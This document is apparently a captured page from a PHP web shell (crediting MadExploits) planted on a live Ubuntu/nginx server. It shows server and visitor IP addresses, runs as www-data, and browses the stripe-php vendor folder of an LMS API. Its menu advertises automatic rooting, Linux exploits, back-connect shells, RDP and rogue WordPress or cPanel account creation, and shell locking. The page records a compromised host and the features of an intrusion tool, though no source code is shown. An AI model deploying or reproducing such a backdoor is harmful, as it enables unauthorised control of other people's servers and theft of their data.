Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-api-8 /
vendor /
stripe /
stripe-php /
[ HOME SHELL ]
Name
Size
Permission
Action
data
[ DIR ]
drwxrwxr-x
lib
[ DIR ]
drwxrwxr-x
.coveralls.github-actions.yml
90
B
-rwxrwxr-x
.editorconfig
268
B
-rwxrwxr-x
.gitignore
688
B
-rwxrwxr-x
.php-cs-fixer.php
2.53
KB
-rwxrwxr-x
CHANGELOG.md
63.23
KB
-rwxrwxr-x
CODE_OF_CONDUCT.md
3.29
KB
-rwxrwxr-x
LICENSE
1.07
KB
-rwxrwxr-x
Makefile
985
B
-rwxrwxr-x
README.md
10.88
KB
-rwxrwxr-x
VERSION
8
B
-rwxrwxr-x
build.php
640
B
-rwxrwxr-x
composer.json
887
B
-rwxrwxr-x
init.php
12.87
KB
-rwxrwxr-x
phpdoc.dist.xml
975
B
-rwxrwxr-x
phpstan-baseline.neon
0
B
-rwxrwxr-x
phpstan.neon.dist
194
B
-rwxrwxr-x
update_certs.php
387
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .gitignore
# Ignore build files build/* # Mac OS X dumps these all over the place. .DS_Store # Ignore the SimpleTest library if it is installed to /test/. /test/simpletest/ # Ignore the /vendor/ directory for people using composer /vendor/ # If the vendor directory isn't being commited the composer.lock file should also be ignored composer.lock # Ignore PHPUnit coverage file clover.xml # Ignore IDE's configuration files .idea # Ignore PHP CS Fixer local config and cache .php_cs .php_cs.cache .php-cs-fixer.cache # Ignore PHPStan local config .phpstan.neon # Ignore phpDocumentor's local config and artifacts .phpdoc/* phpdoc.xml # Ignore cached PHPUnit results. .phpunit.result.cache
Close